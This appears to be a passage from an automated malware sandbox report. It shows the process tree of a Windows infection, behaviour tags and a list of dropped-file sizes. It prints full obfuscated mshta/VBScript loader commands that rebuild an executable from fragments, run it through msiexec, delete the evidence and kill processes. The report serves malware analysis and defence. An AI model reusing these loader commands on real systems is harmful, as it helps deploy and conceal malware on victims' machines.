C:\Users\Admin\Pictures\Adobe Films\fCiMtoJwC8HasRcwNJS0bg1p.exe"C:\Users\Admin\Pictures\Adobe Films\fCiMtoJwC8HasRcwNJS0bg1p.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\rsOU3HwpqyI26RfC61MCjgI5.exe"C:\Users\Admin\Pictures\Adobe Films\rsOU3HwpqyI26RfC61MCjgI5.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe8⤵
-
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"9⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sEMgJzM68edVpY6ZvB_itO35.exe"C:\Users\Admin\Pictures\Adobe Films\sEMgJzM68edVpY6ZvB_itO35.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\JRxI61fpo0ZQfLhLi6CUgoq3.exe"C:\Users\Admin\Pictures\Adobe Films\JRxI61fpo0ZQfLhLi6CUgoq3.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\w7yf21UqqNvJPFCCggjGhcyh.exe"C:\Users\Admin\Pictures\Adobe Films\w7yf21UqqNvJPFCCggjGhcyh.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\E3vtKjE2P7mdqJy_5khbeSju.exe"C:\Users\Admin\Pictures\Adobe Films\E3vtKjE2P7mdqJy_5khbeSju.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XCC0oNWhnnJnJ5L5wJgJm2Fl.exe"C:\Users\Admin\Pictures\Adobe Films\XCC0oNWhnnJnJ5L5wJgJm2Fl.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\5FY7s4pUdLRbZQQSDVKzcfjX.exe"C:\Users\Admin\Pictures\Adobe Films\5FY7s4pUdLRbZQQSDVKzcfjX.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\QznaQlGCkgkDvylXYgLQ_tme.exe"C:\Users\Admin\Pictures\Adobe Films\QznaQlGCkgkDvylXYgLQ_tme.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\qw3aNicOHEsxJ8W3fETs6D82.exe"C:\Users\Admin\Pictures\Adobe Films\qw3aNicOHEsxJ8W3fETs6D82.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\csuphID3J_KRJjeH0Ny0Uig0.exe"C:\Users\Admin\Pictures\Adobe Films\csuphID3J_KRJjeH0Ny0Uig0.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\LGGSAleYtUAp6v2mCtDZfJiF.exe"C:\Users\Admin\Pictures\Adobe Films\LGGSAleYtUAp6v2mCtDZfJiF.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Xa7FiKEqOTSKImttuYGjJQkg.exe"C:\Users\Admin\Pictures\Adobe Films\Xa7FiKEqOTSKImttuYGjJQkg.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QQ_KfPPMR1yLn6WKZWMAg9hk.exe"C:\Users\Admin\Pictures\Adobe Films\QQ_KfPPMR1yLn6WKZWMAg9hk.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\iIFawnudlaKJBRwT_Y1kBHP7.exe"C:\Users\Admin\Pictures\Adobe Films\iIFawnudlaKJBRwT_Y1kBHP7.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\MsftLnvJ_pdzrH2zqjlWZMe0.exe"C:\Users\Admin\Pictures\Adobe Films\MsftLnvJ_pdzrH2zqjlWZMe0.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6172 -s 3368⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0121ab289cd9a.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue0121ab289cd9a.exeTue0121ab289cd9a.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 6525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\cGRxPW4fmZTC8sVr_TJdyu1d.exe"3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1080 -ip 10801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE ( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01e8898e0d1fce4.exe"" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If """" == """" for %K in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01e8898e0d1fce4.exe"") do taskkill /f /IM ""%~NXK"" " , 0 , tRuE) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01e8898e0d1fce4.exe" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If "" == "" for %K in ( "C:\Users\Admin\AppData\Local\Temp\7zS8AFCC7A4\Tue01e8898e0d1fce4.exe") do taskkill /f /IM "%~NXK"2⤵
-
C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE ( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If ""/pzztRb0w26vFPLWe3xRyQv "" == """" for %K in ( ""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"") do taskkill /f /IM ""%~NXK"" " , 0 , tRuE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If "/pzztRb0w26vFPLWe3xRyQv " == "" for %K in ( "C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe") do taskkill /f /IM "%~NXK"5⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPT: cLose ( creATeoBjECt ( "WscriPT.shELL" ). ruN ( "cmD.Exe /c eCHo | SeT /p = ""MZ"" > CejRuqC.56S & copY /Y /b CEJRUqC.56S + D5S9N.M + HOdVbD.N + 6Gk1G.c4O + JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP & del /Q * " , 0 , True ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | SeT /p = "MZ" > CejRuqC.56S & copY /Y /b CEJRUqC.56S + D5S9N.M + HOdVbD.N + 6Gk1G.c4O + JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP & del /Q *5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "6⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>CejRuqC.56S"6⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\32AZBxCS.EP6⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM "Tue01e8898e0d1fce4.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5188 -ip 51881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4352 -ip 43521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4588 -ip 45881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5044 -ip 50441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5128 -ip 51281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6128 -ip 61281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 79ccf3c8e6599f4eab4ffe7feca2e384 jsiBwPJJWEKOfdQkcoKoKQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1096 -ip 10961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3952 -ip 39521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5920 -ip 59201⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5984 -ip 59841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4828 -ip 48281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1188 -ip 11881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1356 -ip 13561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6172 -ip 61721⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
304KB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
1.3MB
-
Filesize
164KB
-
Filesize
3.3MB
-
Filesize
576KB
-
Filesize
40KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
756KB
-
Filesize
756KB
-
Filesize
756KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
688KB
-
Filesize
692KB
-
Filesize
1.1MB
-
Filesize
1.4MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
492KB
-
Filesize
852KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
6.0MB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
164KB
-
Filesize
296KB
-
Filesize
476KB
-
Filesize
524KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
6.1MB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
1.3MB
-
Filesize
192KB
-
Filesize
68KB
-
Filesize
3.3MB
-
Filesize
156KB
-
Filesize
272KB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
4KB